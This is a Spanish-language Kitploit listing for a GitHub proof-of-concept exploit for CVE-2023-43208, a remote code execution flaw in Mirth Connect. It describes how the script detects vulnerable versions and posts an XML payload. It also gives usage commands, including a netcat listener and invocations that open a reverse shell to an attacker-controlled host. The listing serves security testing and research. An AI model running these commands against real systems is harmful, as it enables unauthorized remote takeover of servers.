Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-43208 — PoC para la explotación de RCE CVE-2023-43208. | Kitploit
Herramientas/GitHubGitHub/predyy/cve-2023-43208
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubpredyy/cve-2023-43208

CVE-2023-43208

PoC para la explotación de RCE CVE-2023-43208.

Ver Repositorio
11hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43208 Mirth Connect RCE PoC

Script Python de prueba de concepto dirigido a CVE-2023-43208 en Mirth Connect.

Aviso legal

Úselo únicamente en entornos de los que sea propietario o para los que tenga autorización explícita de prueba. Este repositorio es para investigación de seguridad, validación y pruebas defensivas. El autor no asume ninguna responsabilidad por cualquier uso indebido o daño causado por esta herramienta.

Descripción general

exp.py es una versión de dependencias mínimas del PoC que:

  • Detecta si un objetivo parece ser una instancia de Mirth Connect
  • Solicita la versión de Mirth Connect desde /api/server/version
  • Comprueba si la versión es inferior a 4.4.1
  • Envía una carga útil XML a /api/users si el objetivo parece vulnerable

El script usa HTTPS por defecto y se puede cambiar a HTTP con --http.

Uso

Descargar herramienta
root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

Argumentos

  • -u, --url: URL u host de Mirth Connect objetivo
  • -lh, --lhost: Host/IP local para la conexión reversa
  • -lp, --lport: Puerto local en escucha
  • --http: Forzar HTTP en lugar de HTTPS (el valor predeterminado es HTTPS)

Ejemplo

Inicie primero un listener:

root@kitploit:~
nc -lvnp 4444

Ejecute el script:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

Para un objetivo solo HTTP:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

Notas

  • La verificación del certificado SSL está deshabilitada en el script.
  • El script solicita confirmación antes de enviar la carga útil.
  • La detección de versión se basa en una comparación semántica contra 4.4.1.
  • Un objetivo detectado como Mirth Connect no tiene garantía de ser explotable (las diferencias de red, entorno y tiempo de ejecución pueden afectar los resultados).

Créditos

  • Descubrimiento original de la vulnerabilidad: IHTeam
  • Código original: K3ysTr0K3R y Chocapikk
  • Versión de dependencias mínimas: predyy